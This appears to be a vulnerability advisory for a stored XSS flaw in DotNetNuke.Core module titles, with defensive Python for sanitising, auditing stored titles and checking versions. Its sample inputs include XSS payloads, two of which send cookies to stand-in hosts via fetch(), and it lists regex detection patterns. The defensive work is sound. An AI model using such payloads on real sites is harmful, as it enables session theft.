Platform: dotnet
Component: dotnetnuke.core
Fixed in: 9.13.10, 9.13.11, 10.0.1
CVE-2026-24838 is a stored Cross-Site Scripting (XSS) vulnerability in DotNetNuke.Core, rated critical on this page, affecting versions up to 9.9.1. The module title field accepts rich text content, so an attacker who can set a module title can store markup that is rendered unencoded and executes as script in the browser of anyone who views the page. Successful exploitation could lead to account takeover or defacement. The vulnerability was published on January 28, 2026, and a fix is available from version 9.13.10.
An attacker who can set a module title can store arbitrary JavaScript in it. Because the title is rendered as rich text rather than HTML-encoded, the script runs in the browser of every user who views the affected module, inside that user's session. Outcomes include session hijacking, redirection to phishing sites, theft of cookies and tokens that are readable from script (cookies marked HttpOnly cannot be read, but requests can still be made with them), and actions performed as the victim: an administrator's session can be used to change site content, leading to defacement or malware distribution. Module titles are displayed prominently on most pages, so exposure is broad, and because the payload is stored it persists until the title is cleaned.
CVE-2026-24838 is not listed in the CISA KEV catalog, and public proof-of-concept exploits are not widely available. The EPSS score of 0.03% (10th percentile) predicts a low probability of exploitation in the near term; stored XSS is nevertheless a routine target for automated scanners, and this one is easy to trigger once an attacker can edit a module title. The NVD entry was published on January 28, 2026.
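The defence that closes this class of bug is shown below as an added example; it is not DotNetNuke's own code. When a title does not need markup, HTML-encode it on output. When limited rich text must be kept, rebuild the markup from an allow-list so script blocks, event-handler attributes and javascript: URLs never reach the page. The allowed tag set, the attribute rules and the sample titles are assumptions made for this example.

```python
"""Allow-list sanitiser for a rich-text field such as a module title.

Added example for this page, not DotNetNuke code. The tag/attribute
allow-list below is an assumption; pick the set your templates need.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"b", "i", "em", "strong", "u", "span"}   # assumed allow-list
ALLOWED_ATTRS = {"span": {"class"}}                       # per-tag attributes
SAFE_SCHEMES = {"http", "https"}                          # for <a href=...>


def _safe_href(value: str) -> bool:
    # Deny by default: javascript:, data:, vbscript:, scheme-less and
    # obfuscated ("java\nscript:") URLs all fail to produce an allowed scheme.
    return urlsplit(value.strip()).scheme.lower() in SAFE_SCHEMES


class TitleSanitizer(HTMLParser):
    """Re-emits only allow-listed tags/attributes; everything else becomes text."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.dropped = 0          # tags/attributes removed (useful as an XSS signal)
        self._open: list[str] = []  # tags we emitted, to keep output well formed
        self._skip_depth = 0      # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
            self.dropped += 1
            return
        if self._skip_depth:
            return
        if tag == "br":
            self.out.append("<br>")
            return
        if tag == "a":
            href = dict(attrs).get("href")
            if href and _safe_href(href):
                self.out.append(f'<a href="{escape(href, quote=True)}">')
                self.dropped += len(attrs) - 1     # any other attribute is dropped
                self._open.append("a")
            else:
                self.dropped += 1                  # unsafe link: keep only its text
            return
        if tag not in ALLOWED_TAGS:
            self.dropped += 1                      # <img>, <svg>, <iframe>, ...
            return
        kept = []
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, set()) and value is not None:
                kept.append(f' {name}="{escape(value, quote=True)}"')
            else:
                self.dropped += 1                  # onmouseover=, style=, ...
        self.out.append(f"<{tag}{''.join(kept)}>")
        self._open.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if self._skip_depth or tag not in self._open:
            return
        while self._open:                          # close anything opened after it
            opened = self._open.pop()
            self.out.append(f"</{opened}>")
            if opened == tag:
                break

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data, quote=False))   # text stays text

    def close(self):
        super().close()
        while self._open:                          # close unterminated tags
            self.out.append(f"</{self._open.pop()}>")


def sanitize_title(title: str) -> tuple[str, int]:
    """Return (safe markup, number of dropped tags/attributes)."""
    parser = TitleSanitizer()
    parser.feed(title)
    parser.close()
    return "".join(parser.out), parser.dropped


def encode_title(title: str) -> str:
    """Plain-text alternative when the title never needs markup."""
    return escape(title, quote=True)


if __name__ == "__main__":
    # Constructed sample titles, including typical stored-XSS payloads.
    for sample in ['Welcome <b>users</b>',
                   'News<script>fetch("https://x.test/?c="+document.cookie)</script>',
                   '<img src=x onerror=alert(1)>Title',
                   '<a href="javascript:alert(1)">click</a>']:
        print(repr(sample), "->", sanitize_title(sample))
```

The `dropped` counter doubles as a detection signal: a legitimate editor rarely submits a title that loses tags or attributes, so a non-zero count on save is worth logging.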
Exploit Status
EPSS: 0.03% (10th percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-24838 is to upgrade DotNetNuke.Core to version 9.13.10 or later. If an immediate upgrade is not possible, a Web Application Firewall (WAF) rule that blocks script-like markup (script tags, on*= event handler attributes, javascript: URLs and their entity-encoded forms) in module-title updates reduces exposure, but WAF filters for XSS are routinely bypassed and are a stopgap, not a fix. A more reliable interim measure is to limit which accounts can edit module settings and to audit the module titles already stored, since a payload saved before the upgrade persists after it. Any code that renders user-supplied titles should HTML-encode them, or sanitize them against an allow-list if rich text is genuinely required; a Content Security Policy and HttpOnly session cookies limit what an injected script can do. After upgrading, confirm the fix on a test instance, not production: save a module title containing a harmless marker such as a script tag that only writes text, reload the page, and check in the page source that the angle brackets are rendered encoded and nothing executes.
Update DotNetNuke to version 9.13.10 or later, or to a fixed 10.x release; this page lists 10.0.1 as fixed and 10.2.0 is also cited, so confirm the minimum patched version against the vendor advisory before planning the upgrade. This resolves the stored XSS vulnerability in the module title. The update can be performed through the DotNetNuke administration panel; take a database and file-system backup first.
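The audit of already-stored titles recommended above, as an added example that is not part of this page or of DotNetNuke: it normalises each title (undoing entity encoding and removing control characters used to split keywords) and flags the indicators a stored XSS payload in a title usually carries. The rows are constructed to look like an export of module titles with their page names; the column names are an assumption, and a real run would read them from your site's database export.

```python
"""Triage stored module titles for XSS indicators (added example, not DNN code)."""
import html
import re

# Each indicator is (label, pattern). Patterns run on the normalised title.
SUSPICIOUS = [
    ("script tag", re.compile(r"<\s*script\b", re.I)),
    # an on*= attribute inside a tag: <img src=x onerror=...>, <b/onclick=...>
    ("event handler", re.compile(r"""<[^>]*[\s/"']on[a-z]+\s*=""", re.I)),
    ("javascript: URL", re.compile(r"javascript\s*:", re.I)),
    ("active content tag", re.compile(r"<\s*(iframe|object|embed|svg|math|img)\b", re.I)),
    ("data URL", re.compile(r"data\s*:\s*text/html", re.I)),
]


def normalise(title: str) -> str:
    """Undo up to three layers of entity encoding and drop control characters.

    Entity-encoded payloads are flagged on purpose: a rich-text renderer may
    decode them, and a reviewer should decide, not the script.
    """
    text = title
    for _ in range(3):
        decoded = html.unescape(text)
        if decoded == text:
            break
        text = decoded
    # 'jav&#x09;ascript:' becomes 'jav\tascript:'; removing \t restores the keyword
    return re.sub(r"[\x00-\x1f]", "", text)


def classify_title(title) -> list[str]:
    """Return the indicator labels found in one title (empty list if clean)."""
    if not title:
        return []
    text = normalise(title)
    return [label for label, rx in SUSPICIOUS if rx.search(text)]


def audit_titles(rows) -> list[dict]:
    """Return one finding per row whose ModuleTitle carries any indicator."""
    findings = []
    for row in rows:
        hits = classify_title(row.get("ModuleTitle"))
        if hits:
            findings.append({"TabModuleID": row["TabModuleID"],
                             "Page": row["TabName"],
                             "indicators": hits})
    return findings


# Constructed sample rows; column names are assumed, not DNN's schema.
SAMPLE_ROWS = [
    {"TabModuleID": 401, "TabName": "Home", "ModuleTitle": "Welcome"},
    {"TabModuleID": 402, "TabName": "News", "ModuleTitle": "Latest <b>News</b>"},
    {"TabModuleID": 403, "TabName": "Contact",
     "ModuleTitle": 'Contact <img src=x onerror="fetch(\'https://example.invalid/c?\'+document.cookie)">'},
    {"TabModuleID": 404, "TabName": "About",
     "ModuleTitle": "&lt;script&gt;alert(document.domain)&lt;/script&gt;"},
    {"TabModuleID": 405, "TabName": "Downloads",
     "ModuleTitle": '<a href="jav&#x09;ascript:alert(1)">Get it</a>'},
    {"TabModuleID": 406, "TabName": "Blog", "ModuleTitle": None},
]

if __name__ == "__main__":
    for finding in audit_titles(SAMPLE_ROWS):
        print(finding)
```

Treat the output as a review queue rather than a verdict: the event-handler and active-content patterns are deliberately broad, and a flagged title should be inspected in the database and then replaced with a plain-text version.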
CVE-2026-24838 is a stored Cross-Site Scripting (XSS) vulnerability, rated critical on this page, in DotNetNuke.Core versions up to 9.9.1: the module title's rich-text handling lets script be stored in a title and executed in the browsers of users who view the page.
If you are running DotNetNuke.Core 9.9.1 or earlier, you are potentially affected. Check the DotNetNuke.Core version recorded in your project's packages.lock.json or installed on the site, and upgrade accordingly.
Upgrade DotNetNuke.Core to version 9.13.10 or later. As a temporary stopgap, a WAF rule that filters script-like markup in module-title updates reduces exposure but is not a substitute for the fix.
No active exploitation has been confirmed and the EPSS score is low (0.03%), but stored XSS is easy to exploit once an attacker can edit a title, so the upgrade should not be deferred.
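The version check described above, as an added example that is not part of this page: it reads the `resolved` version of DotNetNuke.Core from a NuGet packages.lock.json and compares it with the fixed releases this page lists (9.13.10, 9.13.11, 10.0.1). Treating every release below the first fixed version on its major line as needing an upgrade is an assumption made here because the page names 9.9.1 as the top of the affected range without stating the status of 9.10 to 9.13.9; the lock file content is constructed.

```python
"""Check a NuGet packages.lock.json for a fixed DotNetNuke.Core (added example)."""
import json

# Fixed releases as listed on this page. Assumption: anything below the first
# fixed release on the same major line needs an upgrade.
FIXED_VERSIONS = ["9.13.10", "9.13.11", "10.0.1"]


def parse_version(v: str) -> tuple:
    """'9.13.10' -> (9, 13, 10, 0); a prerelease such as '9.13.10-rc1' gets a
    trailing -1 so it sorts before the final release, as NuGet/semver do."""
    core, _, prerelease = v.partition("-")
    parts = [int(p) for p in core.split("+", 1)[0].split(".")]
    parts += [0] * (3 - len(parts))
    return tuple(parts) + ((-1,) if prerelease else (0,))


FIXED = [parse_version(f) for f in FIXED_VERSIONS]


def assess(version_str: str) -> str:
    """'fixed', 'needs upgrade', or 'unknown' for a major line this page does not cover."""
    v = parse_version(version_str)
    same_line = [f for f in FIXED if f[0] == v[0]]
    if same_line:
        return "fixed" if v >= min(same_line) else "needs upgrade"
    if v[0] < min(FIXED)[0]:
        return "needs upgrade"   # e.g. 8.x: older than every fixed release
    return "unknown"             # newer major line than the fixed-version list


def scan_lock_file(text: str, package: str = "DotNetNuke.Core") -> dict:
    """Map each target framework in the lock file that references the package
    to (resolved version, assessment). NuGet package IDs are case-insensitive."""
    lock = json.loads(text)
    results = {}
    for tfm, deps in lock.get("dependencies", {}).items():
        for name, info in deps.items():
            if name.lower() == package.lower():
                resolved = info.get("resolved", "0.0.0")
                results[tfm] = (resolved, assess(resolved))
    return results


# Constructed lock file in NuGet's packages.lock.json layout (not a real project).
SAMPLE_LOCK = """{
  "version": 1,
  "dependencies": {
    "net48": {
      "DotNetNuke.Core": {
        "type": "Direct",
        "requested": "[9.9.1, )",
        "resolved": "9.9.1",
        "contentHash": "constructed-for-this-example"
      },
      "Newtonsoft.Json": {
        "type": "Transitive",
        "resolved": "13.0.3",
        "contentHash": "constructed-for-this-example"
      }
    }
  }
}"""

if __name__ == "__main__":
    for tfm, (resolved, verdict) in scan_lock_file(SAMPLE_LOCK).items():
        print(f"{tfm}: DotNetNuke.Core {resolved} -> {verdict}")
```

For a site that is not built from a project file, the same `assess` function can be applied to the DotNetNuke.Core assembly version found on the web server.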
Refer to the official DotNetNuke security advisory for detailed information and updates regarding CVE-2026-24838.